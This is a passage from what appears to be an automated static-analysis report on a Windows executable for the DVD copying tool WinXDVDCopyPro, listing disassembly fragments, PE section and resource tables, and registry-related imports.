                                                                                                                      mov eax, 000000FDh
                                                                                                                      call 00007F75FD12F44Bh
                                                                                                                      push eax
                                                                                                                      push eax
                                                                                                                      push dword ptr [0092909Fh]
                                                                                                                      call 00007F75FD44AE8Eh
                                                                                                                      push dword ptr [0092909Fh]
                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x5d80000x3ca81.edata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x5d30000x3ee6.idata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x6150000x326d9d.rsrc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x9b60000x2090.reloc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x93c0000x3d8ac.reloc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x5d20000x18.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x5d70000x330.didata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                      .text0x10000x5280000x527200c3f30f48e002611fddf54002d1e426ecunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                      .data0x5290000xa80000x9b000aed38f10af5c7e8693192c03247507a4False0.21901619203629033data5.321502334831228IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .tls0x5d10000x10000x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .rdata0x5d20000x10000x200fb6002e177d522f5a511dbf53764c45eFalse0.052734375MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "\235"0.20544562813451883IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                      .idata0x5d30000x40000x40002599b332d1249d8658e1aedfb860171eFalse0.30865478515625data5.068352762746394IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .didata0x5d70000x10000x400d88f99ca61d5c5fbc1cc862ccddecac5False0.4130859375data3.6150461714575237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .edata0x5d80000x3d0000x3cc0096e7599509aceb99962b849b237a05f5False0.22938368055555555data5.853462489205014IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .rsrc0x6150000x326d9d0x326e00684376849ff1e6a7d4e06554c6843b0aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .reloc0x93c0000x8ba240x8b600859ec5e2910662d9a19c2ed297763c67False0.6619026765695067data7.492414291340643IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                      PNG0x6189580xb79PNG image data, 13 x 13, 8-bit/color RGBA, non-interlacedChineseChina1.00374531835206
                                                                                                                      PNG0x6194d40xc64PNG image data, 13 x 13, 8-bit/color RGBA, non-interlacedChineseChina1.003467843631778
                                                                                                                      PNG0x61a1380xbb5PNG image data, 13 x 13, 8-bit/color RGBA, non-interlacedChineseChina1.0036703370036704
                                                                                                                      PNG0x61acf00xb7aPNG image data, 13 x 13, 8-bit/color RGBA, non-interlacedChineseChina1.0037440435670524
                                                                                                                      PNG0x61b86c0x18d1PNG image data, 466 x 45, 8-bit/color RGBA, non-interlacedChineseChina0.9570281756650402
                                                                                                                      PNG0x61d1400x195fPNG image data, 466 x 45, 8-bit/color RGBA, non-interlacedChineseChina0.9587374903772132
                                                                                                                      PNG0x61eaa00xb08PNG image data, 1 x 16, 8-bit/color RGBA, non-interlacedChineseChina1.0038951841359773
                                                                                                                      PNG0x61f5a80x19b2PNG image data, 466 x 45, 8-bit/color RGBA, non-interlacedChineseChina0.9512009729401034
                                                                                                                      PNG0x620f5c0xe63PNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedChineseChina1.0029866956285636
                                                                                                                      PNG0x621dc00xd01PNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedChineseChina1.0033042955842595
                                                                                                                      PNG0x622ac40xe78PNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedChineseChina1.0029697624190064
                                                                                                                      PNG0x62393c0xc64PNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedChineseChina1.003467843631778
                                                                                                                      PNG0x6245a00xef3PNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedChineseChina1.002874314084139
                                                                                                                      PNG0x6254940xc7aPNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedChineseChina1.0034439574201628
                                                                                                                      PNG0x6261100xe9cPNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedChineseChina1.0029411764705882
                                                                                                                      PNG0x626fac0xbf4PNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedChineseChina1.00359477124183
                                                                                                                      PNG0x627ba00xecbPNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedChineseChina1.0029046738843412
                                                                                                                      PNG0x628a6c0xc25PNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedChineseChina1.0035381151495657
                                                                                                                      PNG0x6296940xeafPNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedChineseChina1.0029263101888801
                                                                                                                      PNG0x62a5440xc22PNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedChineseChina1.0035415325177077
                                                                                                                      PNG0x62b1680xf67PNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedChineseChina1.0027897539944204
                                                                                                                      PNG0x62c0d00xc8ePNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedChineseChina1.0034225264467953
                                                                                                                      PNG0x62cd600xea0PNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedChineseChina1.0029380341880343
                                                                                                                      PNG0x62dc000xc18PNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedChineseChina1.0035529715762275
                                                                                                                      PNG0x62e8180xdd1PNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedChineseChina1.003109980209217
                                                                                                                      PNG0x62f5ec0xc6bPNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedChineseChina1.0034602076124568
                                                                                                                      PNG0x6302580xd3dPNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedChineseChina1.0032457952198288
                                                                                                                      PNG0x630f980xbe4PNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedChineseChina1.0036136662286466
                                                                                                                      PNG0x631b7c0xec1PNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedChineseChina1.0029123643102993
                                                                                                                      PNG0x632a400xc2cPNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedChineseChina1.0035301668806162
                                                                                                                      PNG0x63366c0xef0PNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedChineseChina1.0028765690376569
                                                                                                                      PNG0x63455c0xc5dPNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedChineseChina1.0034755134281201
                                                                                                                      PNG0x6351bc0xf14PNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedChineseChina1.0028497409326425
                                                                                                                      PNG0x6360d00xc57PNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedChineseChina1.0034821145932258
                                                                                                                      PNG0x636d280xe79PNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedChineseChina1.0029689608636978
                                                                                                                      PNG0x637ba40xc3cPNG image data, 20 x 20, 8-bit/color RGBA, non-interlacedChineseChina1.0035121328224776
                                                                                                                      PNG0x6387e00x1f92PNG image data, 466 x 45, 8-bit/color RGBA, non-interlacedChineseChina0.9669636228656273
                                                                                                                      PNG0x63a7740xfddPNG image data, 30 x 30, 8-bit/color RGBA, non-interlacedChineseChina1.0027086924402857
                                                                                                                      PNG0x63b7540x10f2PNG image data, 30 x 30, 8-bit/color RGBA, non-interlacedChineseChina1.0025357307514984
                                                                                                                      PNG0x63c8480x122fPNG image data, 30 x 30, 8-bit/color RGBA, non-interlacedChineseChina1.0023630504833512
                                                                                                                      PNG0x63da780x10ecPNG image data, 30 x 30, 8-bit/color RGBA, non-interlacedChineseChina1.002539242843952
                                                                                                                      PNG0x63eb640x121fPNG image data, 30 x 30, 8-bit/color RGBA, non-interlacedChineseChina1.0023712006898038
                                                                                                                      PNG0x63fd840x1083PNG image data, 30 x 30, 8-bit/color RGBA, non-interlacedChineseChina1.002602318429146
                                                                                                                      PNG0x640e080x11c6PNG image data, 30 x 30, 8-bit/color RGBA, non-interlacedChineseChina1.0024175824175825
                                                                                                                      PNG0x641fd00x1188PNG image data, 30 x 30, 8-bit/color RGBA, non-interlacedChineseChina1.0024509803921569
                                                                                                                      PNG0x6431580xf56PNG image data, 30 x 30, 8-bit/color RGBA, non-interlacedChineseChina1.0028018339276616
                                                                                                                      PNG0x6440b00xf1bPNG image data, 30 x 30, 8-bit/color RGBA, non-interlacedChineseChina1.0028445823635894
                                                                                                                      PNG0x644fcc0x1116PNG image data, 30 x 30, 8-bit/color RGBA, non-interlacedChineseChina1.002514860539552
                                                                                                                      PNG0x6460e40x118dPNG image data, 30 x 30, 8-bit/color RGBA, non-interlacedChineseChina1.0024482528377476
                                                                                                                      PNG0x6472740x12c1PNG image data, 30 x 30, 8-bit/color RGBA, non-interlacedChineseChina1.002291189335555
                                                                                                                      PNG0x6485380x1140PNG image data, 30 x 30, 8-bit/color RGBA, non-interlacedChineseChina1.0024909420289856
                                                                                                                      PNG0x6496780xb28PNG image data, 18 x 16, 8-bit/color RGBA, non-interlacedChineseChina1.0038515406162465
                                                                                                                      PNG0x64a1a00xbecPNG image data, 18 x 16, 8-bit/color RGBA, non-interlacedChineseChina1.0036041939711664
                                                                                                                      PNG0x64ad8c0xc9dPNG image data, 18 x 16, 8-bit/color RGBA, non-interlacedChineseChina1.0034066274388356
                                                                                                                      PNG0x64ba2c0xc2ePNG image data, 11 x 11, 8-bit/color RGBA, non-interlacedChineseChina1.0035279025016035
                                                                                                                      PNG0x64c65c0xc55PNG image data, 11 x 11, 8-bit/color RGBA, non-interlacedChineseChina1.0034843205574913
                                                                                                                      PNG0x64d2b40xc38PNG image data, 11 x 11, 8-bit/color RGBA, non-interlacedChineseChina1.0035166240409208
                                                                                                                      PNG0x64deec0xb3dPNG image data, 18 x 16, 8-bit/color RGBA, non-interlacedChineseChina1.0038234271810915
                                                                                                                      PNG0x64ea2c0xc04PNG image data, 18 x 16, 8-bit/color RGBA, non-interlacedChineseChina1.0035760728218466
                                                                                                                      PNG0x64f6300xca6PNG image data, 18 x 16, 8-bit/color RGBA, non-interlacedChineseChina1.003397158739963
                                                                                                                      RT_CURSOR0x6502d80x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                      RT_CURSOR0x65040c0x134dataEnglishUnited States0.4642857142857143
                                                                                                                      RT_CURSOR0x6505400x134dataEnglishUnited States0.4805194805194805
                                                                                                                      RT_CURSOR0x6506740x134dataEnglishUnited States0.38311688311688313
                                                                                                                      RT_CURSOR0x6507a80x134dataEnglishUnited States0.36038961038961037
                                                                                                                      RT_CURSOR0x6508dc0x134dataEnglishUnited States0.4090909090909091
                                                                                                                      RT_CURSOR0x650a100x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                      RT_BITMAP0x650b440x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                                      RT_BITMAP0x650d140x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                                                                                      RT_BITMAP0x650ef80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                                      RT_BITMAP0x6510c80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                                                                                      RT_BITMAP0x6512980x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                                                                                      RT_BITMAP0x6514680x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                                                                                      RT_BITMAP0x6516380x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                                                                                      RT_BITMAP0x6518080x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                      RT_BITMAP0x6519d80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                                                                                      RT_BITMAP0x651ba80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                      RT_BITMAP0x651d780xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.5208333333333334
                                                                                                                      RT_BITMAP0x651e380xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.42857142857142855
                                                                                                                      RT_BITMAP0x651f180xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.4955357142857143
                                                                                                                      RT_BITMAP0x651ff80xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.38392857142857145
                                                                                                                      RT_BITMAP0x6520d80xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.4947916666666667
                                                                                                                      RT_BITMAP0x6521980xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.484375
                                                                                                                      RT_BITMAP0x6522580xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.42410714285714285
                                                                                                                      RT_BITMAP0x6523380x328Device independent bitmap graphic, 16 x 16 x 24, image size 768, resolution 3780 x 3780 px/mEnglishUnited States0.14975247524752475
                                                                                                                      RT_BITMAP0x6526600xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.5104166666666666
                                                                                                                      RT_BITMAP0x6527200xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.5
                                                                                                                      RT_BITMAP0x6528000xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                                                                                      RT_BITMAP0x6528e80x328Device independent bitmap graphic, 16 x 16 x 24, image size 768, resolution 3780 x 3780 px/mEnglishUnited States0.12995049504950495
                                                                                                                      RT_BITMAP0x652c100xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.4895833333333333
                                                                                                                      RT_BITMAP0x652cd00x328Device independent bitmap graphic, 16 x 16 x 24, image size 768, resolution 3780 x 3780 px/mEnglishUnited States0.12128712871287128
                                                                                                                      RT_BITMAP0x652ff80x328Device independent bitmap graphic, 16 x 16 x 24, image size 768, resolution 3780 x 3780 px/mEnglishUnited States0.13861386138613863
                                                                                                                      RT_BITMAP0x6533200x328Device independent bitmap graphic, 16 x 16 x 24, image size 768, resolution 3780 x 3780 px/mEnglishUnited States0.07054455445544554
                                                                                                                      RT_BITMAP0x6536480xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.3794642857142857
                                                                                                                      RT_ICON0x6537280x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584ChineseChina0.39818703418904533
                                                                                                                      RT_ICON0x663f500x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896ChineseChina0.5146433632498819
                                                                                                                      RT_ICON0x6681780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600ChineseChina0.5699170124481328
                                                                                                                      RT_ICON0x66a7200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224ChineseChina0.5940431519699813
                                                                                                                      RT_ICON0x66b7c80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088ChineseChina0.6950354609929078
                                                                                                                      RT_DIALOG0x66bc300x52data0.7682926829268293
                                                                                                                      RT_DIALOG0x66bc840x52data0.7560975609756098
                                                                                                                      RT_STRING0x66bcd80x218Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0ChineseChina0.2798507462686567
                                                                                                                      RT_STRING0x66bef00x140dataChineseChina0.346875
                                                                                                                      RT_STRING0x66c0300x4cdata0.618421052631579
                                                                                                                      RT_STRING0x66c07c0x92data0.6438356164383562
                                                                                                                      RT_STRING0x66c1100x186data0.5743589743589743
                                                                                                                      RT_STRING0x66c2980x1cedata0.5303030303030303
                                                                                                                      RT_STRING0x66c4680x130data0.5592105263157895
                                                                                                                      RT_STRING0x66c5980x7edata0.6666666666666666
                                                                                                                      RT_STRING0x66c6180x24data0.4166666666666667
                                                                                                                      RT_STRING0x66c63c0x158data0.5348837209302325
                                                                                                                      RT_STRING0x66c7940x370data0.37386363636363634
                                                                                                                      RT_STRING0x66cb040x4e0data0.3685897435897436
                                                                                                                      RT_STRING0x66cfe40xb44data0.2725381414701803
                                                                                                                      RT_STRING0x66db280x794data0.3077319587628866
                                                                                                                      RT_STRING0x66e2bc0x3a4data0.36802575107296137
                                                                                                                      RT_STRING0x66e6600x390data0.4298245614035088
                                                                                                                      RT_STRING0x66e9f00x2fcdata0.4607329842931937
                                                                                                                      RT_STRING0x66ecec0xbcdata0.6170212765957447
                                                                                                                      RT_STRING0x66eda80x108data0.5643939393939394
                                                                                                                      RT_STRING0x66eeb00x2d8data0.41895604395604397
                                                                                                                      RT_STRING0x66f1880x308data0.42396907216494845
                                                                                                                      RT_STRING0x66f4900x428data0.3693609022556391
                                                                                                                      RT_STRING0x66f8b80x38cdata0.3931718061674009
                                                                                                                      RT_STRING0x66fc440x268data0.3782467532467532
                                                                                                                      RT_STRING0x66feac0xdcdata0.5636363636363636
                                                                                                                      RT_STRING0x66ff880x11cdata0.5774647887323944
                                                                                                                      RT_STRING0x6700a40x3d0data0.3719262295081967
                                                                                                                      RT_STRING0x6704740x434data0.3243494423791822
                                                                                                                      RT_STRING0x6708a80x374data0.3766968325791855
                                                                                                                      RT_STRING0x670c1c0x37cdata0.4226457399103139
                                                                                                                      RT_STRING0x670f980x404data0.32782101167315175
                                                                                                                      RT_STRING0x67139c0x43cdata0.3874538745387454
                                                                                                                      RT_STRING0x6717d80x3a8data0.3472222222222222
                                                                                                                      RT_STRING0x671b800x424data0.36792452830188677
                                                                                                                      RT_RCDATA0x671fa40xcbfPNG image data, 60 x 20, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0033711308611708
                                                                                                                      RT_RCDATA0x672c640xd21PNG image data, 32 x 32, 8-bit/color RGBA, non-interlacedRussianRussia1.0032728354656353
                                                                                                                      RT_RCDATA0x6739880xcddPNG image data, 31 x 31, 8-bit/color RGBA, non-interlacedRussianRussia1.0033404190707562
                                                                                                                      RT_RCDATA0x6746680x82e8dataEnglishUnited States0.11261637622344235
                                                                                                                      RT_RCDATA0x67c9500x10data1.5
                                                                                                                      RT_RCDATA0x67c9600x434PNG image data, 48 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0102230483271375
                                                                                                                      RT_RCDATA0x67cd940x4b1PNG image data, 48 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0091590341382182
                                                                                                                      RT_RCDATA0x67d2480x1a1PNG image data, 48 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.026378896882494
                                                                                                                      RT_RCDATA0x67d3ec0x671PNG image data, 48 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0066707095209217
                                                                                                                      RT_RCDATA0x67da600x7b1PNG image data, 48 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.005586592178771
                                                                                                                      RT_RCDATA0x67e2140xb5eDelphi compiled form '\014TAboutDialog\013AboutDialog\007Caption\006\013AboutDialog\014ClientHeight\003\325'0.31305841924398625
                                                                                                                      RT_RCDATA0x67ed740x6159Delphi compiled form 'TAddFrame'0.0873159183018338
                                                                                                                      RT_RCDATA0x684ed00x18bDelphi compiled form 'TBaseFrame'0.660759493670886
                                                                                                                      RT_RCDATA0x68505c0x76Delphi compiled form '\020TBurnFolderFrame\017BurnFolderFrame'0.8813559322033898
                                                                                                                      RT_RCDATA0x6850d40xcde7Delphi compiled form '\022TBurnInitErrorForm\021BurnInitErrorForm\007Caption\006\021BurnInitErrorForm\014ClientHeight\003\257'0.12033541386048453
                                                                                                                      RT_RCDATA0x691ebc0x64Delphi compiled form ''0.92
                                                                                                                      RT_RCDATA0x691f200x2663cDelphi compiled form '\025TBurnnerProgressFrame\024BurnnerProgressFrame\005Width\003\373\001\006Height\003\004\001'0.17787642135788964
                                                                                                                      RT_RCDATA0x6b855c0x15f9eDelphi compiled form '\024TBurnnerSettingFrame\023BurnnerSettingFrame\005Width\003\373\001\006Height\003\004\001'0.32533828071188925
                                                                                                                      RT_RCDATA0x6ce4fc0x15a3eDelphi compiled form '\024TChangeDiscHintFrame\023ChangeDiscHintFrame\005Width\003\373\001\006Height\003\004\001'0.32569552562106546
                                                                                                                      RT_RCDATA0x6e3f3c0x262aDelphi compiled form '\023TChapterBackupFrame\022ChapterBackupFrame'0.2374616171954964
                                                                                                                      RT_RCDATA0x6e65680x62ceDelphi compiled form '\021TCheckUpgradeForm\020CheckUpgradeForm\007Caption\006\020CheckUpgradeForm\014ClientHeight\003\231'0.08725389420415909
                                                                                                                      RT_RCDATA0x6ec8380x2bc04Delphi compiled form '\023TConverterSizeFrame\022ConverterSizeFrame\005Width\003\373\001\006Height\003\004\001'0.1925459253141671
                                                                                                                      RT_RCDATA0x71843c0x2bb79Delphi compiled form '\025TConvertProgressFrame\024ConvertProgressFrame\005Width\003\373\001\006Height\003\004\001'0.1921481026442912
                                                                                                                      RT_RCDATA0x743fb80x12a5bDelphi compiled form '\017TCopyToDVDFrame\016CopyToDVDFrame\010OnResize\007\013FrameResize'0.12356799643881171
                                                                                                                      RT_RCDATA0x756a140xe865Delphi compiled form '\021TCopyToMPEG2Frame\020CopyToMPEG2Frame\010OnResize\007\013FrameResize'0.15304321516817104
                                                                                                                      RT_RCDATA0x76527c0x60d3Delphi compiled form '\013TDialogForm'0.22277806914915077
                                                                                                                      RT_RCDATA0x76b3500xffa3Delphi compiled form '\017TDvdBurnerFrame\016DvdBurnerFrame\006Height\0035\002\016ExplicitHeight\0035\002'0.10147762174716929
                                                                                                                      RT_RCDATA0x77b2f40x6dDelphi compiled form '\020TDVDCreatorFrame\017DVDCreatorFrame'0.8715596330275229
                                                                                                                      RT_RCDATA0x77b3640x637dDelphi compiled form '\016TDVDToDVDFrame'0.14484275000981586
                                                                                                                      RT_RCDATA0x7816e40xa1Delphi compiled form '\021TDVDToFolderFrame\020DVDToFolderFrame'0.7639751552795031
                                                                                                                      RT_RCDATA0x7817880xa7Delphi compiled form '\016TDVDToISOFrame'0.8383233532934131
                                                                                                                      RT_RCDATA0x7818300xa825Delphi compiled form '\022TExtractAudioFrame\021ExtractAudioFrame'0.16622139621326518
                                                                                                                      RT_RCDATA0x78c0580xa84dDelphi compiled form '\025TExtractSubtitleFrame\024ExtractSubtitleFrame'0.16527793895787396
                                                                                                                      RT_RCDATA0x7968a80xa87fDelphi compiled form '\022TExtractVideoFrame\021ExtractVideoFrame'0.14600672307870638
                                                                                                                      RT_RCDATA0x7a11280x2807Delphi compiled form '\023TFullDVDBackupFrame\022FullDVDBackupFrame'0.1314531082267981
                                                                                                                      RT_RCDATA0x7a39300x73Delphi compiled form '\022TImageMounterFrame\021ImageMounterFrame'0.8434782608695652
                                                                                                                      RT_RCDATA0x7a39a40xa7b2Delphi compiled form '\024TInstallKB932716Form\023InstallKB932716Form\007Caption\006\023InstallKB932716Form\014ClientHeight\003\273'0.14942930351735384
                                                                                                                      RT_RCDATA0x7ae1580x35461Delphi compiled form '\023TLastestVersionForm\022LastestVersionForm\007Caption\006\022LastestVersionForm\014ClientHeight\003\365'0.09033999514227185
                                                                                                                      RT_RCDATA0x7e35bc0xcf93Delphi compiled form '\021TLicenseErrorForm\020LicenseErrorForm\007Caption\006\020LicenseErrorForm\014ClientHeight\003\257'0.12418374451909144
                                                                                                                      RT_RCDATA0x7f05500xeba60Delphi compiled form '\011TMainForm\010MainForm\007Caption\006\016WinXDVDCopyPro\014ClientHeight\003\205\002\013ClientWidth\003\331\003\005Color\004\362\362\362'0.19788731226999967
                                                                                                                      RT_RCDATA0x8dbfb00x5a2Delphi compiled form 'TPathDialogForm'0.48613037447988905
                                                                                                                      RT_RCDATA0x8dc5540x10fDelphi compiled form 'TPngForm'0.7859778597785978
                                                                                                                      RT_RCDATA0x8dc6640x31bDelphi compiled form ''0.3849056603773585
                                                                                                                      RT_RCDATA0x8dc9800x627bDelphi compiled form '\021TRegistChangeForm\020RegistChangeForm\007Caption\006\020RegistChangeForm\010Position\007\016poScreenCenter\006OnShow\007\010FormShow'0.09551386299631114
                                                                                                                      RT_RCDATA0x8e2bfc0x1ebf4Delphi compiled form ''0.2483484198824837
                                                                                                                      RT_RCDATA0x9017f00x1ca8Delphi compiled form 'TsCalcForm'0.1736641221374046
                                                                                                                      RT_RCDATA0x9034980x1b89Delphi compiled form 'TsColorDialogForm'0.24783657256348418
                                                                                                                      RT_RCDATA0x9050240xb390Delphi compiled form '\017TSelectDVDFrame\016SelectDVDFrame'0.12197615732683606
                                                                                                                      RT_RCDATA0x9103b40x1524bDelphi compiled form '\025TShowRegisterDlgFrame\024ShowRegisterDlgFrame\007Caption\006\017ShowRegisterDlg\014ClientHeight\003K\001\013ClientWidth\003\240\001\006OnShow\007\010FormShow'0.33691673498608593
                                                                                                                      RT_RCDATA0x9256000x30aDelphi compiled form 'TsPopupCalendar'0.6002570694087404
                                                                                                                      RT_RCDATA0x92590c0x9615Delphi compiled form '\024TToolIsoMounterFrame\023ToolIsoMounterFrame\016DoubleBuffered\011\024ParentDoubleBuffered\010'0.15306733296894928
                                                                                                                      RT_RCDATA0x92ef240xc24aDelphi compiled form '\023TUpgradeVersionForm\022UpgradeVersionForm\007Caption\006\022UpgradeVersionForm\014ClientHeight\003\305'0.0532791829184929
                                                                                                                      RT_RCDATA0x93b1700x10dDelphi compiled form 'TUserMessageForm'0.7434944237918215
                                                                                                                      RT_RCDATA0x93b2800x60bDelphi compiled form 'TVariableForm'0.35488041370394313
                                                                                                                      RT_GROUP_CURSOR0x93b88c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                      RT_GROUP_CURSOR0x93b8a00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                      RT_GROUP_CURSOR0x93b8b40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x93b8c80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x93b8dc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x93b8f00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x93b9040x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_ICON0x93b9180x4cdataChineseChina0.8026315789473685
                                                                                                                      RT_VERSION0x93b9640x2bcdataChineseChina0.4828571428571429
                                                                                                                      RT_MANIFEST0x93bc200x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                      DLLImport
                                                                                                                      ADVAPI32.DLLAdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegCloseKey, RegConnectRegistryW, RegCreateKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyExW, RegEnumValueW, RegFlushKey, RegLoadKeyW, RegOpenKeyExW, RegQueryInfoKeyW, RegQueryValueExW, RegReplaceKeyW, RegRestoreKeyW, RegSaveKeyW, RegSetValueExW, RegUnLoadKeyW
